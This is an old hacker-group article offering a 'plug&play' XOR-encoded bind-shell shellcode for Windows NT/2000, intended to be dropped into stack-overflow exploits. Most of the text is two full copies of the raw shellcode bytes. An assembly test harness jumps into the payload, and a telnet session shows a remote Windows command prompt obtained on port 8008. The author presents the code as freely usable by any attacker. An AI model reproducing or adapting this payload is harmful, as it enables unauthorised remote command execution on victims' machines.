	___________________________________________________________________


		       (c) 2000 DeepZone. All rights reserved.

		     _-=[ plug&play WinNT/2k remote shellcode ]=-_

                              by |Zan <izan@deepzone.org>

		http://www.deepzone.org - http://mareasvivas.cjb.net

	___________________________________________________________________


	
	Background
	__________

	At the present moment the number of overflows which appear for the
	NT kernel are becoming an inmense problem for the administrators
	running WinNT/2K.

	Since the posibility of exploiting with some guarantees this type
	of vulnerabilities has arisen, many people are announcing new bofs,
	accompanying their warnings with some kind of code in which addresses,
	archives or an apparent setting is pressuposed, which does not have
	to occur in a real remote system.

        The problem arises if it was a portable code which any hacker could
        easily include in his/her exploit.


	Introduction
	____________

	This text is not going to overview the principle of the stacks
	re-writting and the control of the programmes flow which is behind
	the classic stack overflowing.
 
	Numerous resources can be found in the WWW along with adequate
	bibliography in order to understand this last point or for one to
	document him/herself on a certaqin matter related to this. In any case,
	at the end of this commentary, you can find the most popular references
	on stack-overflows and the theory which lies behind these [1]

	The following two points in this document shows a portable shellcode
	for WinNT/2K that will create a listening console at the 8008 port
	along with its integration in a generic exploit.


	plug&play shellcode
	___________________

	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (00h xor 99h)
        LLB3    equ     (00h xor 99h)
        LLB4    equ     (00h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (00h xor 99h)
        GPB3    equ     (00h xor 99h)
        GPB4    equ     (00h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --


	howto ?
	_______

	let's see this code ...

	; Tasm 5.0/x86

	.386p
	locals
	jumps
	.model flat, stdcall

	extrn LoadLibraryA:PROC
	extrn GetProcAddress:PROC
        extrn WSAStartup:PROC


	.data

        wsadescription_len equ 256
        wsasys_status_len equ 128

        WSAdata struct
                wVersion       dw ?
                wHighVersion   dw ?
                szDescription  db wsadescription_len+1 dup (?)
                szSystemStatus db wsasys_status_len+1  dup (?)
                iMaxSockets    dw ?
                iMaxUdpDg      dw ?
                lpVendorInfo   dw ?
        WSAdata ends
        wsadata WSAdata <?>

	__strKERNEL32		db	'KERNEL32', 0
	__strExitProcess	db	'ExitProcess', 0		

	
	; -- begin x86/asm --

        LLB1    equ     (00h xor 99h)
        LLB2    equ     (40h xor 99h)
        LLB3    equ     (30h xor 99h)
        LLB4    equ     (50h xor 99h)

        GPB1    equ     (00h xor 99h)
        GPB2    equ     (40h xor 99h)
        GPB3    equ     (30h xor 99h)
        GPB4    equ     (54h xor 99h)

	DeepZone_w32ShellCode:
	db 068h, 05eh, 056h, 0c3h, 090h, 054h, 059h, 0ffh, 0d1h
	db 058h, 033h, 0c9h, 0b1h, 01ch, 090h, 090h, 090h, 090h
	db 003h, 0f1h, 056h, 05fh, 033h, 0c9h, 066h, 0b9h, 095h
	db 004h, 090h, 090h, 090h, 0ach, 034h, 099h, 0aah, 0e2h
	db 0fah, 071h, 099h, 099h, 099h, 099h, 0c4h, 018h, 074h
	db 040h, 0b8h, 0d9h, 099h, 014h, 02ch, 06bh, 0bdh, 0d9h
	db 099h, 014h, 024h, 063h, 0bdh, 0d9h, 099h, 0f3h, 09eh
	db 009h, 009h, 009h, 009h, 0c0h, 071h, 04bh, 09bh, 099h
	db 099h, 014h, 02ch, 0b3h, 0bch, 0d9h, 099h, 014h, 024h
	db 0aah, 0bch, 0d9h, 099h, 0f3h, 093h, 009h, 009h, 009h
	db 009h, 0c0h, 071h, 023h, 09bh, 099h, 099h, 0f3h, 099h
	db 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 07ch, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch, 070h, 0bch
	db 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch, 0d9h, 099h
	db 0f3h, 099h, 014h, 02ch, 040h, 0bch, 0d9h, 099h, 0cfh
	db 014h, 02ch, 074h, 0bch, 0d9h, 099h, 0cfh, 014h, 02ch
	db 068h, 0bch, 0d9h, 099h, 0cfh, 066h, 00ch, 0aah, 0bch
	db 0d9h, 099h, 05eh, 01ch, 06ch, 0bch, 0d9h, 099h, 0ddh
	db 099h, 099h, 099h, 014h, 02ch, 06ch, 0bch, 0d9h, 099h
	db 0cfh, 066h, 00ch, 0aeh, 0bch, 0d9h, 099h, 014h, 02ch
	db 0b4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0cah
	db 0bch, 0d9h, 099h, 014h, 02ch, 0a8h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0cah, 0bch, 0d9h, 099h, 014h
	db 02ch, 068h, 0bch, 0d9h, 099h, 014h, 024h, 0b4h, 0bfh
	db 0d9h, 099h, 03ch, 014h, 02ch, 07ch, 0bch, 0d9h, 099h
	db 034h, 014h, 024h, 0a8h, 0bfh, 0d9h, 099h, 032h, 014h
	db 024h, 0ach, 0bfh, 0d9h, 099h, 032h, 05eh, 01ch, 0bch
	db 0bfh, 0d9h, 099h, 099h, 099h, 099h, 099h, 05eh, 01ch
	db 0b8h, 0bfh, 0d9h, 099h, 098h, 098h, 099h, 099h, 014h
	db 02ch, 0a0h, 0bfh, 0d9h, 099h, 0cfh, 014h, 02ch, 06ch
	db 0bch, 0d9h, 099h, 0cfh, 0f3h, 099h, 0f3h, 099h, 0f3h
	db 089h, 0f3h, 098h, 0f3h, 099h, 0f3h, 099h, 014h, 02ch
	db 0d0h, 0bfh, 0d9h, 099h, 0cfh, 0f3h, 099h, 066h, 00ch
	db 0a2h, 0bch, 0d9h, 099h, 0f1h, 099h, 0b9h, 099h, 099h
	db 009h, 0f1h, 099h, 09bh, 099h, 099h, 066h, 00ch, 0dah
	db 0bch, 0d9h, 099h, 010h, 01ch, 0c8h, 0bfh, 0d9h, 099h
	db 0aah, 059h, 0c9h, 0d9h, 0c9h, 0d9h, 0c9h, 066h, 00ch
	db 063h, 0bdh, 0d9h, 099h, 0c9h, 0c2h, 0f3h, 089h, 014h
	db 02ch, 050h, 0bch, 0d9h, 099h, 0cfh, 0cah, 066h, 00ch
	db 067h, 0bdh, 0d9h, 099h, 0f3h, 09ah, 0cah, 066h, 00ch
	db 09bh, 0bch, 0d9h, 099h, 014h, 02ch, 0cch, 0bfh, 0d9h
	db 099h, 0cfh, 014h, 02ch, 050h, 0bch, 0d9h, 099h, 0cfh
	db 0cah, 066h, 00ch, 09fh, 0bch, 0d9h, 099h, 014h, 024h
	db 0c0h, 0bfh, 0d9h, 099h, 032h, 0aah, 059h, 0c9h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h, 0c9h, 0c9h
	db 014h, 02ch, 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h
	db 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch
	db 0d6h, 0bch, 0d9h, 099h, 072h, 0d4h, 009h, 009h, 009h
	db 0aah, 059h, 0c9h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 0ceh, 0c9h, 0c9h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h
	db 099h, 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h
	db 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 01ah
	db 024h, 0fch, 0bfh, 0d9h, 099h, 09bh, 096h, 01bh, 08eh
	db 098h, 099h, 099h, 018h, 024h, 0fch, 0bfh, 0d9h, 099h
	db 098h, 0b9h, 099h, 099h, 0ebh, 097h, 009h, 009h, 009h
	db 009h, 05eh, 01ch, 0fch, 0bfh, 0d9h, 099h, 099h, 0b9h
	db 099h, 099h, 0f3h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h
	db 099h, 014h, 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0c9h
	db 012h, 01ch, 0c8h, 0bfh, 0d9h, 099h, 0c9h, 014h, 02ch
	db 070h, 0bch, 0d9h, 099h, 034h, 0c9h, 066h, 00ch, 0deh
	db 0bch, 0d9h, 099h, 0f3h, 0a9h, 066h, 00ch, 0d6h, 0bch
	db 0d9h, 099h, 012h, 01ch, 0fch, 0bfh, 0d9h, 099h, 0f3h
	db 099h, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 093h, 0bch, 0d9h, 099h, 0f3h, 099h, 014h
	db 024h, 0fch, 0bfh, 0d9h, 099h, 0ceh, 0f3h, 099h, 0f3h
	db 099h, 0f3h, 099h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0a6h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0aah, 050h
	db 0a0h, 014h, 0fch, 0bfh, 0d9h, 099h, 096h, 01eh, 0feh
	db 066h, 066h, 066h, 0f3h, 099h, 0f1h, 099h, 0b9h, 099h
	db 099h, 009h, 014h, 02ch, 0c8h, 0bfh, 0d9h, 099h, 034h
	db 0c9h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h, 034h, 0c9h
	db 066h, 00ch, 097h, 0bch, 0d9h, 099h, 010h, 01ch, 0f8h
	db 0bfh, 0d9h, 099h, 0f3h, 099h, 014h, 024h, 0fch, 0bfh
	db 0d9h, 099h, 0ceh, 0c9h, 014h, 02ch, 0c8h, 0bfh, 0d9h
	db 099h, 034h, 0c9h, 014h, 02ch, 074h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0d2h, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 0f3h, 099h
	db 012h, 01ch, 0f8h, 0bfh, 0d9h, 099h, 014h, 024h, 0fch
	db 0bfh, 0d9h, 099h, 0ceh, 0c9h, 012h, 01ch, 0c8h, 0bfh
	db 0d9h, 099h, 0c9h, 014h, 02ch, 070h, 0bch, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 0deh, 0bch, 0d9h, 099h, 0f3h
	db 0a9h, 066h, 00ch, 0d6h, 0bch, 0d9h, 099h, 070h, 020h
	db 067h, 066h, 066h, 014h, 02ch, 0c0h, 0bfh, 0d9h, 099h
	db 034h, 0c9h, 066h, 00ch, 08bh, 0bch, 0d9h, 099h, 014h
	db 02ch, 0c4h, 0bfh, 0d9h, 099h, 034h, 0c9h, 066h, 00ch
	db 08bh, 0bch, 0d9h, 099h, 0f3h, 099h, 066h, 00ch, 0ceh
	db 0bch, 0d9h, 099h, 0c8h, 0cfh, 0f1h, LLB4, LLB3, LLB2
	db LLB1, 009h, 0c3h, 066h, 08bh, 0c9h, 0c2h, 0c0h, 0ceh
	db 0c7h, 0c8h, 0cfh, 0cah, 0f1h, GPB4, GPB3, GPB2, GPB1
	db 009h, 0c3h, 066h, 08bh, 0c9h, 035h, 01dh, 059h, 0ech
	db 062h, 0c1h, 032h, 0c0h, 07bh, 070h, 05ah, 0ceh, 0cah
	db 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah
	db 0f2h, 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h
	db 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h, 0fah
	db 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh
	db 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 0fah, 0f5h, 0f6h
	db 0eah, 0fch, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h
	db 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh
	db 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h
	db 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h
	db 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0c9h, 0fch, 0fch
	db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h
	db 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h
	db 0f5h, 0f5h, 0f6h, 0fah, 099h, 0cbh, 0fch, 0f8h, 0fdh
	db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0ceh, 0ebh, 0f0h, 0edh
	db 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch
	db 0fch, 0e9h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h
	db 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0dch, 0e1h, 0f0h
	db 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
	db 0dah, 0f6h, 0fdh, 0fch, 0fdh, 0b9h, 0fbh, 0e0h, 0b9h
	db 0e5h, 0c3h, 0f8h, 0f7h, 0b9h, 0a5h, 0f0h, 0e3h, 0f8h
	db 0f7h, 0d9h, 0fdh, 0fch, 0fch, 0e9h, 0e3h, 0f6h, 0f7h
	db 0fch, 0b7h, 0f6h, 0ebh, 0feh, 0a7h, 09bh, 099h, 086h
	db 0d1h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 095h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 098h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0dah
	db 0d4h, 0ddh, 0b7h, 0dch, 0c1h, 0dch, 099h, 099h, 099h
	db 099h, 099h, 089h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
	db 099h, 099h, 099h, 099h, 090h, 090h, 090h, 090h, 090h

	; -- end x86/asm --
	

	.code

	start:
		
		push    offset wsadata
		push    0101h
		call    WSAStartup

                jmp     DeepZone_w32ShellCode	; testing purposes
						
		push	offset	__strKERNEL32
		call	LoadLibraryA
		push	offset	__strExitProcess
		push	eax
                call    GetProcAddress
		push	0
		call	eax
	
	end start


	The previous code has been designed in order to work with
	the only two API adresses which are present in 99% of the
	cases in an executable instruction of windows obtains the
	address of ExitProcess dynamically and ends its execution
	with the 0 return value, ignoring the shellcode if the
	unconditional jump is not executed.

	On the other hand, if the unconditional jump is executed
	the shellcode takes command.

	The first three lines include the initialization of winsock
	as the remote server in which the b0fs is generated has
	already been initialized whien the b0f occures and the shell
	does not really need to reinitialize Winsock.


	If we inspect the code more closely we can see that the calls
	to the LoadLibraryA and to the GetProcAddress APIs are made
	by menas of an indirect jump...


	LoadLibraryA     ----->   jmp dword ptr [00403050]
	GetProcAddress   ----->   jmp dword ptr [00403054]


	The addresses we are looking for are ..........

	00403050 for LoadlibraryA and 00403054 for GetProcAddress.

	The shellcode has been xored with a value of 99h in order to
	eliminate possible null readings, so that when we store the
	addresses, this fact must be taken into account.

	At this point we add these two addresses which have been xored
	byte by byte and we try to execute the test code simulating the
	seizing of the flow  by means of an unconditional jump against
	the shellcode.

	Lests verify that we have control over a remote console ...


	$ uname
	Linux

	$ telnet mana.mareas.deepzone.org 8008
	Trying 192.168.14.34...
	Connected to mana.mareas.deepzone.org.
	Escape character is '^]'.

	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-1999 Microsoft Corp.

	C:>


	last words ...
	______________

	
	With this article we have  tried to show an efficient and
	quick road so as to exploit stack overflowing in winNT/2k.
	At the same time, we are providing you with a portable
	shellcode which can be easily integrated and used freely
	without any restriction.

	The last actualizations of this article and also the optimizations
	of this code can be downloaded from http://www.deepzone.org


	---

	[1] "Smashing The Stack For Fun And Profit"
	     http://www.phrack.com/search.phtml?view&article=p49-14

            "Win32 Buffer Overflows (Location, Exploitation and Prevention)"
             http://www.phrack.com/search.phtml?view&article=p55-15


	___________________________________________________________________

					     		       -- |Zan/DZ
							<izan@deepzone.org>
	___________________________________________________________________
	
